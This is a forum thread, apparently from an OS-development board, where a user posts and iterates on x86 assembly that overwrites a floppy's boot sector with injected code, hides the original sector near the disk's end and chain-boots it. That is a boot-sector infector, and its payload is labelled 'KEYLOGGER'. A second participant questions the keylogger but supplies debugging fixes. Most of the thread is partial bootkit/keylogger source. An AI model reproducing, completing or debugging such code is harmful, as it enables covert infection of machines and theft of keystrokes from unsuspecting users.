install code at boot sector of floppy

[bruninho]

I am trying to install my code onto boot sector however the floppy disk don't boot with my code injected. Here is part of my source:

Code: Select all

mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h

LEA DI,[SETOR+3EH]
MOV SI,CODE
MOV CX,1C0h
REP MOVSB

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es

;push cx
;push dx

sub cl,6
;lea bx,[setor+3Eh]
mov bx,SETOR
mov ax,301h
mov dl,0h
int 13h

;pop dx
;pop cx

mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H

ret

CODE:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf
cli
IN AL,64H
...

What is wrong in my source above?

[Octocontrabass]

How do you know the problem is with the code you've shown here, and not something else?

[bruninho]

How do you know the problem is with the code you've shown here, and not something else?

Because the OS just should boot from this code at bootstrap sector.

[Octocontrabass]

Have you checked the disk using a hex editor to see if your code was successfully written to the disk?

[bruninho]

Have you checked the disk using a hex editor to see if your code was successfully written to the disk?

Yes. The boot sector was modified however it dont is writed at last sector - 6 that should be saved at final of disk.

[Octocontrabass]

Check the return values from the INT 0x13 call. Does the BIOS say the write was successful?

[bruninho]

Check the return values from the INT 0x13 call. Does the BIOS say the write was successful?

I already check the values at AH register and the INT 13h was writed sucessfully. I am already afraid beacause i dont understand what is happening

[bruninho]

I think the error is:

Code: Select all

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
INT 13H
MOV AX,301H
MOV CX,1
INT 13H
MOV DL,0
INT 19H

[Octocontrabass]

Are you trying to back up and restore the original boot sector? You're not backing up the original boot sector, so you can't restore it.

[bruninho]

Are you trying to back up and restore the original boot sector? You're not backing up the original boot sector, so you can't restore it.

Yes i write the original bootstrap sector at 6 last sectors.

Why you say that i not backup the 1st sector?

[Octocontrabass]

Because you never write the original first sector back to the disk.

1. You read the first sector to a buffer in memory
2. You modify the buffer
3. You write the modified buffer to a sector near the end of the disk
4. You write the modified buffer to the first sector

[bruninho]

I've modified my source code however it don't solve my problem. The Operating System don't bootstrap with this source:

Code: Select all

mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov ax,301h
sub cl,6
mov dl,0
mov bx,SETOR
INT 13H

LEA DI,[SETOR+3EH]
MOV SI,KEYLOGGER
MOV CX,1C0h
REP MOVSB

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H

ret

CODE:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf

.............

IN AL,64H

.............

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
INT 13H
MOV DL,0
MOV AX,301H
MOV CX,1
;CS
MOV BX,SETOR
INT 13H
MOV DL,0
INT 19H

BUF db 2048 dup (0)
SETOR  db 512 dup(0)

What should i do?

[Octocontrabass]

Why are you writing a keylogger?

[bruninho]

Why are you writing a keylogger?

For educational purposes.

See my source that still dont work:

Code: Select all

mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov ax,301h
sub cl,6
mov dl,0
mov bx,SETOR
INT 13H

LEA DI,[SETOR+3EH]
MOV SI,KEYLOGGER
MOV CX,1C0h
REP MOVSB

mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es


mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H

ret

KEYLOGGER:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf



IN AL,64H



mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
MOV BX,SETOR
INT 13H
MOV DL,0
MOV AX,301H
MOV CX,1
;CS
MOV BX,SETOR
INT 13H
MOV DL,0
INT 19H

BUF db 2048 dup (0)
SETOR  db 512 dup(0)

And still dont bootstrap with floppy disk. Why?

[Octocontrabass]

Code: Select all

mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h

Any MOV to SS must be followed immediately by a MOV to SP. Having instructions between them can cause issues.

Code: Select all

push 61Ch

Are you sure this is the right value? Perhaps you should use label arithmetic to come up with it instead. (Also, since the address is a constant, you can use a far JMP instead of a far RET.)

Code: Select all

push es
mov es,di
pop es
INT 13H

I think you copy-pasted this code in the wrong order.

Code: Select all

MOV BX,SETOR

Will this label evaluate to a reasonable address if you use it inside your "keylogger"?